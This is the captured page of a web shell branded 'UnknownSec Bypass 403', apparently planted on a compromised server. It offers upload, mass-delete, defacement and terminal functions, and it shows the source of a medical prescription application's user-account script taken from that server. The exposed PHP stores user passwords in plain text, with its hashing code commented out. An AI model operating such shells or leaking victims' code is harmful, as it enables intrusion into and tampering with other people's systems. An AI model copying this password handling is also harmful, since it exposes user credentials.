UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
stmedicosoftware
/
prescription
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
user_save_update.php
<?php require_once "../config.php"; session_start(); $uname = mysqli_real_escape_string($conn,$_POST['uname']); $mobileno= mysqli_real_escape_string($conn,$_POST['mobileno']); $username= mysqli_real_escape_string($conn,$_POST['username']); $password= mysqli_real_escape_string($conn,$_POST['password']); //$psw= mysqli_real_escape_string($conn,md5($_POST['cuspassword'])); $userrole= mysqli_real_escape_string($conn,$_POST['userrole']); // $userdetailid= mysqli_real_escape_string($conn,$_POST['userdetailid']); $id = mysqli_real_escape_string($conn,$_POST['userid']); // $canteen = mysqli_real_escape_string($conn,$_POST['canteenname']); $btntext = $_POST['btntext']; $creationdatetime = date("Y-m-d H:m:s"); $modificationdatetime=date("Y-m-d H:m:s"); $message= ""; // $hash_psw = password_hash($psw, // PASSWORD_DEFAULT); // $query = "select count(0) as count from userdetailstb where username='".$username."' and active='".$isactive."' and isdeleted='".$isnotdeleted."'"; $query = "select count(0) as count from userdetailstb where username='".$username."' and active='".$isactive."'"; $result = mysqli_query($conn,$query); while($row = mysqli_fetch_array($result)) { $message=$row["count"]; } if($btntext=="Save") { if($message=="0") { // $query="insert into logintb(uname,mobileno,username,password,userrole,status,isdeleted) // Values('".$uname."','".$mobileno."','".$username."','".$password."','".$userrole."','".$isactive."','".$isnotdeleted."')"; $query="insert into userdetailstb(uname,mobileno,username,userpassword,permissiontype,creationdatetime,createdbyuserid,active) Values('".$uname."','".$mobileno."','".$username."','".$password."','".$userrole."','".$creationdatetime."','".$_SESSION['userid']."','".$isactive."')"; $result = mysqli_query($conn, $query); if($result==true) $message="1"; } else { $message="2"; } } else if($btntext=="Update") { // $query = "select count(0) as count from logintb where id!='".$id."' and username='".$username."' and status='".$isactive."' and isdeleted='".$isnotdeleted."'"; $query = "select count(0) as count from userdetailstb where userdetailsid!='".$id."' and username='".$username."' and active='".$isactive."'"; $result = mysqli_query($conn,$query); while($row = mysqli_fetch_array($result)) { $message= $row["count"]; } if($message=="0") { // $query="Update logintb set uname='".$uname."',mobileno='".$mobileno."',password='".$password."' where id='".$id."'"; $query="Update userdetailstb set uname='".$uname."',mobileno='".$mobileno."',userpassword='".$password."',permissiontype='".$userrole."',modificationdatetime='".$modificationdatetime."',modifiedbyuserid='".$_SESSION['userid']."' where userdetailsid='".$id."'"; $result = mysqli_query($conn, $query); if($result==true) $message="3"; } else { $message="2"; } } else if($btntext=="Active") { $query="Update userdetailstb set active='".$isactive."' where userdetailsid ='".$id."'"; $result = mysqli_query($conn, $query); if($result==true) $message="4"; } else if($btntext=="DeActive") { $query="Update userdetailstb set active='".$isnotactive."' where userdetailsid ='".$id."'"; $result = mysqli_query($conn, $query); if($result==true) $message="5"; } echo json_encode($message); ?>
Copyright © 2025 - UnknownSec